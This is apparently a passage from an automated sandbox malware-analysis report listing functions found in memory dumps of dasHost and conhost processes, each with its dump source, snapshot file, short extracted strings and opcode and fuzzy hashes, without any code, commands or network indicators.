                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: c3574f17ea6472ccfd9d5795fce2fde2abe249d1d78e15150e0c03fe877680af
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: 97E01A70F4911A4BFBA8B248D8E13F96264EF8A304F145078DB6ED33C5DD3DAD409605
                                                                                    Function 00007FFD343E3E90 Relevance: .0, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                    Function 00007FFD343E4BD7 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction ID: 07d9137669ff819bbfef3455231f0d6bd9c63b4847d5cabdd0a3aaa4c5b20c5f
                                                                                    • Opcode Fuzzy Hash: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction Fuzzy Hash: B0D05B21B4D91747E645FA045CE077B2161EF19300F140074D64FC31C2CD3CE8427601
                                                                                    Function 00007FFD343D06AD Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction ID: 3048f9248019bea7b6f186f8c5423cf2b2eab0437b84f9e769dd21ee3450d732
                                                                                    • Opcode Fuzzy Hash: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction Fuzzy Hash: 16C08C00FCB58B00B400316E18E60ECA120DBC7A28FD00032D30CD20959C3F20C5214A
                                                                                    Function 00007FFD343D12D8 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction ID: f2c7580b359e954caa7700577bdda0318b4c9fe2d3013718838c153da6db0bf5
                                                                                    • Opcode Fuzzy Hash: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction Fuzzy Hash: 3DC04C345558098FC948FB2DC99591477A0FB1A215BD50190E409C7171D66ADCD5D741
                                                                                    Function 00007FFD343D06D0 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: 735aa1df858eb5aeddf2c33aa0c7ee299a1304de0fead9086c4a11b781a4167b
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 26B01200DD748F00A40431BA08D60A47050AB47104FC00070D60CC1089987F10942242

                                                                                    Non-executed Functions

                                                                                    Function 00007FFD343D09B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 5c11b98ec9938e19b535ff5304182636e63fc7208d12de738dafda1f959acbdf
                                                                                    • Instruction ID: ea701b244c41a3dadb844275df2aec8f17d56ebb99556ec92d02f40348e8dd15
                                                                                    • Opcode Fuzzy Hash: 5c11b98ec9938e19b535ff5304182636e63fc7208d12de738dafda1f959acbdf
                                                                                    • Instruction Fuzzy Hash: 0151A007B0E56345E32233FD70611EE6BA8DF8233AB584677E24CDB0834D1A65C682E5

                                                                                    Executed Functions

                                                                                    Function 00007FFD343E0E06 Relevance: 9.4, Strings: 6, Instructions: 1876COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8IH4$@[H4$H_H4$XxH4$zG4$qH4
                                                                                    • API String ID: 0-690594405
                                                                                    • Opcode ID: 632cccd9c0abcde26b55bcf95101c6d94b2ad3ebb3d93b9f18f98ae62bb94a3c
                                                                                    • Instruction ID: 8d27fc0d85df868da20cf4dbe4fbc8b9cb05e9de7e2671b4ab87ea2f7f1ef0d1
                                                                                    • Opcode Fuzzy Hash: 632cccd9c0abcde26b55bcf95101c6d94b2ad3ebb3d93b9f18f98ae62bb94a3c
                                                                                    • Instruction Fuzzy Hash: 97D2A432B5D95A4FEF98FB1884A16A9B3D2FF95300F1445B9D50ED3282CE39BC829741
                                                                                    Function 00007FFD343E1A7E Relevance: 8.8, Strings: 6, Instructions: 1281COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8IH4$@[H4$H_H4$XxH4$zG4$qH4
                                                                                    • API String ID: 0-690594405
                                                                                    • Opcode ID: 6e648265cd352e961bed5e5a7c1760d5b5eb47c9e7ee7e13c28c8907e99cdb86
                                                                                    • Instruction ID: 3cff36aa18058c8d6851b6568837685db15a7598d239f66d065c7ef9bd230d70
                                                                                    • Opcode Fuzzy Hash: 6e648265cd352e961bed5e5a7c1760d5b5eb47c9e7ee7e13c28c8907e99cdb86
                                                                                    • Instruction Fuzzy Hash: B992A222B5D95A4FEB98FB1884A17B5B3D1FF95300F1845B9D50ED32C2CE39AC829B41
                                                                                    Function 00007FFD343E14A9 Relevance: 6.0, Strings: 4, Instructions: 1041COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 1565b5f7b03837fad5f1f6c7266dc412a605aca0cb350404b582181472890f2a
                                                                                    • Instruction ID: ba2a1f866f4fb964064196cbadf73603294a57b18cb05496c3d3d4361aea1518
                                                                                    • Opcode Fuzzy Hash: 1565b5f7b03837fad5f1f6c7266dc412a605aca0cb350404b582181472890f2a
                                                                                    • Instruction Fuzzy Hash: EC72A222B5D91A4FEB98FB1884A17B5B3D1FF95300F1845B9D50ED32C6CD39AC829B41
                                                                                    Function 00007FFD343E1411 Relevance: 6.0, Strings: 4, Instructions: 1003COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 0416b9afad3ecec9d05b68ef4bcf2bbe5ca337b8b7e1c672db5cf76cb54c50e9
                                                                                    • Instruction ID: 614d548cbd275ff6427719a62fd3421625647ce32aca0769009ad79be7bc2b1e
                                                                                    • Opcode Fuzzy Hash: 0416b9afad3ecec9d05b68ef4bcf2bbe5ca337b8b7e1c672db5cf76cb54c50e9
                                                                                    • Instruction Fuzzy Hash: FE62A222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50ED32C6CD39AC829B41
                                                                                    Function 00007FFD343E1338 Relevance: 6.0, Strings: 4, Instructions: 958COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 80415954f0215c76690531a9933b9abc59f5affb2751551a7f9393e4afe71d77
                                                                                    • Instruction ID: d1c0ed77eaeae106c969d8313abef4b60a976737e4935b2cb26e3924e642a3e6
                                                                                    • Opcode Fuzzy Hash: 80415954f0215c76690531a9933b9abc59f5affb2751551a7f9393e4afe71d77
                                                                                    • Instruction Fuzzy Hash: 03629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Function 00007FFD343E12F4 Relevance: 6.0, Strings: 4, Instructions: 958COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 328873043357d79cb41c36714ec80a25fea30ff9a5f2e37ba539a2f7bada8328
                                                                                    • Instruction ID: 70ea46b44147ee68d68d99c566051b9339d9fa6bbe51bb6529b9abea9028de27
                                                                                    • Opcode Fuzzy Hash: 328873043357d79cb41c36714ec80a25fea30ff9a5f2e37ba539a2f7bada8328
                                                                                    • Instruction Fuzzy Hash: 63629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Function 00007FFD343E13C0 Relevance: 6.0, Strings: 4, Instructions: 958COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: e03d0db45975ed722a1bee357286be69dd32046ecf85515628abe50aaafef993
                                                                                    • Instruction ID: dbb534a5f03424f85c7be8e419df4e1ada17f458e4dcaedaf0e73104eee45528
                                                                                    • Opcode Fuzzy Hash: e03d0db45975ed722a1bee357286be69dd32046ecf85515628abe50aaafef993
                                                                                    • Instruction Fuzzy Hash: 04629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Function 00007FFD343E137C Relevance: 6.0, Strings: 4, Instructions: 958COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 07eac8f12ce4cbcafa3f5b7fc8531aa548a98230e636d288610d8851fd9d8835
                                                                                    • Instruction ID: 4dc864a854bab4b9f722624ef7c7b4fb4beead4f7b0e258b98730c6860c2ef67
                                                                                    • Opcode Fuzzy Hash: 07eac8f12ce4cbcafa3f5b7fc8531aa548a98230e636d288610d8851fd9d8835
                                                                                    • Instruction Fuzzy Hash: B7629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Function 00007FFD343E1404 Relevance: 6.0, Strings: 4, Instructions: 958COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @[H4$H_H4$XxH4$qH4
                                                                                    • API String ID: 0-3035333748
                                                                                    • Opcode ID: 32ef6a4f5fd9714169a718f1dbc4a042592a94de2cebdf0a3c39c6fa33a7329e
                                                                                    • Instruction ID: f81f13c9dff5c02893cf5d8cf36a3775a223c385845e00fbd5414fb25a5c01d5
                                                                                    • Opcode Fuzzy Hash: 32ef6a4f5fd9714169a718f1dbc4a042592a94de2cebdf0a3c39c6fa33a7329e
                                                                                    • Instruction Fuzzy Hash: B5629222B5D91A4FEB98FB1884A17B5B3E1FF95300F1845B9D50DD32C6CE39AC829B41
                                                                                    Function 00007FFD343D0D48 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5[_H
                                                                                    • API String ID: 0-3279724263
                                                                                    • Opcode ID: a8dfdafaef71384e31f532012ce8ff2562aca210eb232f135fae636a7fdab404
                                                                                    • Instruction ID: f941329fe6c05d008d6c6ff8601ca06024043b23c272ee6c2d324e59b47c3596
                                                                                    • Opcode Fuzzy Hash: a8dfdafaef71384e31f532012ce8ff2562aca210eb232f135fae636a7fdab404
                                                                                    • Instruction Fuzzy Hash: 9B91B0B5A19A898FE799EB68C8757E97FE1FB96304F1500BBC04AD73D2CA791811C700
                                                                                    Function 00007FFD343D0E43 Relevance: .2, Instructions: 171COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1921f275748427feef736a07e044e66e72c4b71d1f9aef1313907bb55bf3834f
                                                                                    • Instruction ID: 20a606fe27131df32759ff635d5cd2c86a56bf4d204fa01adb76650b44b8b2b5
                                                                                    • Opcode Fuzzy Hash: 1921f275748427feef736a07e044e66e72c4b71d1f9aef1313907bb55bf3834f
                                                                                    • Instruction Fuzzy Hash: D2519FB6B19A498BE798DB5CD465BE97FE1FB9A314F50017EC00ED7791CAB91811C300
                                                                                    Function 00007FFD343D08D0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 9d6f2de6ca173ace325e2a615c72fe0d455e6fafc7775daaaaa69735de16a4c1
                                                                                    • Instruction ID: 7a43c1da0cf82bbfbfdd3bb0be5bdf77b0a42f5afe9c78c9cff22c96e7c2ad76
                                                                                    • Opcode Fuzzy Hash: 9d6f2de6ca173ace325e2a615c72fe0d455e6fafc7775daaaaa69735de16a4c1
                                                                                    • Instruction Fuzzy Hash: 55415812B4D6660FE715B7BCA0B56F977A4EF8A335B1444BBD14DC7193CE29A88182C0
                                                                                    Function 00007FFD343D0960 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 4b086bc74400f2e4ba191525747b7cea73d7953251384793ff155ec5169c4dda
                                                                                    • Instruction ID: f28697a0f0a143e8e2b480565693f473a6180f3a6e6fe50da0c3dbc619f85fb6
                                                                                    • Opcode Fuzzy Hash: 4b086bc74400f2e4ba191525747b7cea73d7953251384793ff155ec5169c4dda
                                                                                    • Instruction Fuzzy Hash: AA31E421B5DA190FF764B7AC64A66F973D5EF8A325F1444BBE40DC31D3CD2AAC818284
                                                                                    Function 00007FFD343D0998 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 94f31b70c55ad443df6ae8340d63a71e7927e73c0390a1a5d308a3a20cb9d036
                                                                                    • Instruction ID: a8217c9b451451adc7c95bbb2ba6100161c7db07ad670fd19434bcab77d7d5a6
                                                                                    • Opcode Fuzzy Hash: 94f31b70c55ad443df6ae8340d63a71e7927e73c0390a1a5d308a3a20cb9d036
                                                                                    • Instruction Fuzzy Hash: D921F220B599590FF798F76C94A96B977C6EF9A321F0540B9E40EC32E2DD39AC418280
                                                                                    Function 00007FFD343E3E79 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: I
                                                                                    • API String ID: 0-3707901625
                                                                                    • Opcode ID: e48cee1027e4841cd7602fc842a062a82e6595f5f54977bb866b62b32c35afe8
                                                                                    • Instruction ID: ac234ff9dbf8d27131357c6d54bdfd49a1db4cf95054320098e49e93c8bd06fc
                                                                                    • Opcode Fuzzy Hash: e48cee1027e4841cd7602fc842a062a82e6595f5f54977bb866b62b32c35afe8
                                                                                    • Instruction Fuzzy Hash: CFE0127194B3C04FCB49EB3584A58957F60EF6721078E50EEC145CF1A3D62DD889C701
                                                                                    Function 00007FFD343E4275 Relevance: .1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4999263f1d7dad6a1f6a8c5a5d3e48b330a4df7a97789409692938ccb96fd58f
                                                                                    • Instruction ID: ec4734ecc5b48e27e7927fa953edc6f0ddbab1437bfc486c9c976bf1950e4c2c
                                                                                    • Opcode Fuzzy Hash: 4999263f1d7dad6a1f6a8c5a5d3e48b330a4df7a97789409692938ccb96fd58f
                                                                                    • Instruction Fuzzy Hash: EC21B032F0951B8AFB54EB48D8A56BF77A2FF65300F04053AC219D7381DF7969819780
                                                                                    Function 00007FFD343D0C25 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction ID: 24eda12cd9a6022ea02aa2f8bf9272e9b29073fb4f36e0cb2ed3e6b450d99e4f
                                                                                    • Opcode Fuzzy Hash: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction Fuzzy Hash: 21210135B0E2898FE712EB2888A51DC7FB0EF83329F1445B7C280DF192D5391A4AA741
                                                                                    Function 00007FFD343D0C38 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction ID: 3f96e98a21404424cbaacd5540ac77989398d89523c784de7e1146948ce8a7b1
                                                                                    • Opcode Fuzzy Hash: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction Fuzzy Hash: D111CE35B0E7888FE702EB2898A42DD7FB0EF83319F1544B7C284DF292D5391A499780
                                                                                    Function 00007FFD343D0C40 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction ID: 6541a784fb46a1b52f8c29ef641667630fa5a2dcfa7baf3616abb2f26d24beba
                                                                                    • Opcode Fuzzy Hash: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction Fuzzy Hash: 1001AD35A0E7888FE702EB2884A42DD7FB0EF43314F1545EAC180DB292D5395A489B80
                                                                                    Function 00007FFD343D5EF1 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction ID: 9baded12b1604edbc2eb12ceec086a47201f661f8c663b4e58f9a3816c87e6f6
                                                                                    • Opcode Fuzzy Hash: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction Fuzzy Hash: CE012120E9D91D4AE7A5B61888B57BC61A1EF4B700F5001B5D91DE3292ED3E6D44A740
                                                                                    Function 00007FFD343D5F11 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: 7dddf225c71f9e7a0ec9b22fc1032d6338144fc44058bdbccf12c89b7a2c25cf
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 57016D30A9D40E8AEBA8BA04D8A5BF872A5EF16300F5001B9D90ED31A1EE3D29C55A41
                                                                                    Function 00007FFD343D0C48 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
